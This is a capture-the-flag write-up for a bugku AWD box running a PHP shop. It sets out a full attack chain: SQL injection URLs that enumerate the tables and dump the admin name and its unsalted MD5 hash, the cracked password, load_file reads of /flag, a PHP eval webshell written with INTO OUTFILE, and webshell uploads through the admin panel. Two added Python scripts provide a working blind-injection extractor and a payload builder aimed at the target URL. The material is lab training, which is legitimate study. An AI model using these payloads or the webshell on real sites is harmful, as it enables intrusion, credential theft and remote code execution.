bugku AWD reproduction S1-4

image-20230613185656897

The search feature has a SQL injection.

// I actually started with blind injection here (lll¬ω¬), force of habit from writing scripts

http://114.67.175.224:10093/index.php/product/list?keyword=flag%27union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19  from information_schema.tables where table_schema=database()%23

pe_ad,pe_admin,pe_article,pe_ask,pe_cart,pe_category,pe_class,pe_collect,pe_comment,pe_link,pe_order,pe_orderdata,pe_page,pe_payway,pe_product,pe_setting,pe_user

http://114.67.175.224:10093/index.php/product/list?keyword=flag%27union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19  from information_schema.columns where table_name='pe_admin'%23

admin_id,admin_name,admin_pw,admin_atime,admin_ltime

http://114.67.175.224:10093/index.php/product/list?keyword=flag%27union select 1,concat_ws('-',admin_id,admin_name,admin_pw,admin_atime,admin_ltime),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19  from pe_admin%23

1-admin-7fef6171469e80d32c0559f88b377245-1269059337-1614397988

admin_pw is an unsalted MD5 hash; looking up 7fef6171469e80d32c0559f88b377245 gives admin888.
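The blind-injection route mentioned at the top, as an added example (not the author's script and not the target's code): a constructed in-memory SQLite stand-in for the vulnerable search endpoint holds the pe_admin row the UNION dump returned, and a boolean-based extractor recovers admin_pw one character at a time by binary search on its code point, then checks candidate passwords against the hash offline instead of via an online lookup. SQLite is used only so it runs offline; the MySQL equivalents of the pieces that differ (unicode() vs ascii(), the `-- ` vs `#` comment) are noted in the comments.

```python
import hashlib
import sqlite3
from typing import Optional

# Constructed stand-in for the vulnerable search endpoint: an in-memory SQLite
# database with the pe_admin row the UNION dump returned, queried through the
# same unsanitised string concatenation the target exposes.  Only the admin
# table is modelled; the real target has 17 pe_* tables.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE pe_product (product_id INTEGER, product_name TEXT);
INSERT INTO pe_product VALUES (1, 'flag'), (2, 'other product');
CREATE TABLE pe_admin (admin_id INTEGER, admin_name TEXT, admin_pw TEXT,
                       admin_atime INTEGER, admin_ltime INTEGER);
INSERT INTO pe_admin VALUES (1, 'admin', '7fef6171469e80d32c0559f88b377245',
                             1269059337, 1614397988);
""")


def vulnerable_search(keyword: str) -> list:
    """Simulates /product/list?keyword=...: the keyword goes straight into SQL."""
    sql = f"SELECT product_name FROM pe_product WHERE product_name LIKE '%{keyword}%'"
    return _db.execute(sql).fetchall()


def oracle(cond: str) -> bool:
    """True iff the injected condition holds: the 'flag' product row only comes
    back when the ANDed condition is true.  '-- ' is SQLite's line comment; on
    the MySQL target the writeup uses '#'."""
    return len(vulnerable_search(f"flag' AND ({cond})-- ")) > 0


def blind_extract(scalar_query: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction of a single-value subquery, one character
    at a time, binary-searching the code point (7 requests per character).
    SQLite: unicode(substr(...)); the MySQL equivalent is ascii(substr(...))."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(f"unicode(substr(({scalar_query}),{pos},1))>={mid}"):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:  # substr past the end is '' -> unicode('') is NULL -> never true
            break
        out.append(chr(lo))
    return "".join(out)


def crack_md5(digest: str, wordlist) -> Optional[str]:
    """Offline check of candidate passwords against the recovered unsalted hash;
    the writeup did the same step through an online MD5 lookup."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


if __name__ == "__main__":
    pw_hash = blind_extract("SELECT admin_pw FROM pe_admin WHERE admin_id=1")
    print(pw_hash, crack_md5(pw_hash, ["admin", "123456", "admin888"]))
```

Each character costs seven requests; on the real box the same loop would issue HTTP requests with the keyword value and decide true/false from whether the product row is present in the response, which is why the UNION route is so much faster once the column count is known.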

Check the file read/write privilege via @@global.secure_file_priv

http://114.67.175.224:10093/index.php/product/list?keyword=flag%27union select 1,@@global.secure_file_priv,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23

It comes back empty, which means load_file() and INTO OUTFILE are not confined to any directory (NULL would have disabled both entirely, and a path would have restricted them to that directory).

image-20230613183143680

Method 1

The flag can be read directly with load_file('/flag')

image-20230613183440838

Method 2

Alternatively, write a webshell (this also needs the MySQL process to have write access to the web root):

http://114.67.175.224:10093/index.php/product/list?keyword=flag%27union select 1,'<?php eval($_GET["shark"])?>',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 into outfile '/var/www/html/evil.php'%23
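Every payload above (the three information_schema/pe_admin dumps, the secure_file_priv check, load_file() and INTO OUTFILE) is the same shape: close the string literal, UNION SELECT with the interesting expression in the second column and numeric filler in the other 18, comment out the rest with #. The Python builder below is an added example (not the author's script or the target's code) that generates them from the 19-column width the writeup found, and also decides what a given secure_file_priv value permits for a path. The TARGET constant is the URL from the writeup; the ORDER BY column-count probe is the standard step the writeup skips and is my assumption about how the 19 was found.

```python
import posixpath
from urllib.parse import quote

# Values the writeup reports for this box: the injectable endpoint and the
# column width of the vulnerable SELECT.
TARGET = "http://114.67.175.224:10093/index.php/product/list"
NCOLS = 19


def order_by_probe(n: int) -> str:
    """Column-count probe (assumed, not shown in the writeup): the first n for
    which ORDER BY n errors out is one past the column count."""
    return f"flag' order by {n}#"


def union_payload(expr: str, from_clause: str = "", tail: str = "",
                  ncols: int = NCOLS, slot: int = 2) -> str:
    """Close the string literal, append a UNION SELECT whose column `slot`
    carries `expr` and whose other columns are numeric filler, then comment
    out the remainder of the original query with '#'."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = expr
    sql = f"flag'union select {','.join(cols)}"
    if from_clause:
        sql += f" from {from_clause}"
    if tail:
        sql += f" {tail}"
    return sql + "#"


def enumerate_tables() -> str:
    return union_payload("group_concat(table_name)",
                         "information_schema.tables where table_schema=database()")


def enumerate_columns(table: str) -> str:
    return union_payload("group_concat(column_name)",
                         f"information_schema.columns where table_name='{table}'")


def dump_rows(table: str, columns: list) -> str:
    return union_payload(f"concat_ws('-',{','.join(columns)})", table)


def read_secure_file_priv() -> str:
    return union_payload("@@global.secure_file_priv")


def read_file(path: str) -> str:
    return union_payload(f"load_file('{path}')")


def write_file(path: str, content: str) -> str:
    """INTO OUTFILE writes every row of the whole UNION result, so the filler
    columns (and any rows the original query matched) land in the file too;
    PHP ignores everything outside the <?php ... ?> tags."""
    return union_payload(f"'{content}'", tail=f"into outfile '{path}'")


def secure_file_priv_allows(value, path: str) -> bool:
    """What a @@global.secure_file_priv value permits for `path`:
    NULL (None) disables LOAD_FILE and INTO OUTFILE entirely, '' (this box)
    allows any path, and a directory confines both to that tree."""
    if value is None:
        return False
    if value == "":
        return True
    base = posixpath.normpath(value) + "/"
    return posixpath.normpath(path).startswith(base)


def to_url(keyword: str) -> str:
    """Full request URL with the keyword percent-encoded (the writeup's URLs
    leave spaces raw; browsers encode them on the way out)."""
    return f"{TARGET}?keyword={quote(keyword, safe='')}"


if __name__ == "__main__":
    for p in (enumerate_tables(), enumerate_columns("pe_admin"),
              dump_rows("pe_admin", ["admin_id", "admin_name", "admin_pw"]),
              read_secure_file_priv(), read_file("/flag"),
              write_file("/var/www/html/evil.php", '<?php eval($_GET["shark"])?>')):
        print(to_url(p))
```

The secure_file_priv_allows check normalises the path before comparing, so a traversal like /var/lib/mysql-files/../../../flag is correctly rejected when the variable is set to a directory; the only reason Methods 1 and 2 work on this box is that the value is the empty string.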

image-20230613183804624

Method 3

Log in to the admin panel with the admin/admin888 credentials obtained above; the information management page allows file uploads.

image-20230613185806055

Although the upload shows this message:

image-20230613185831443

the file was in fact uploaded successfully.

image-20230613185846247

The image URL is the webshell URL.

image-20230613185936865

The ad list page also accepts a webshell upload.

image-20230613190303375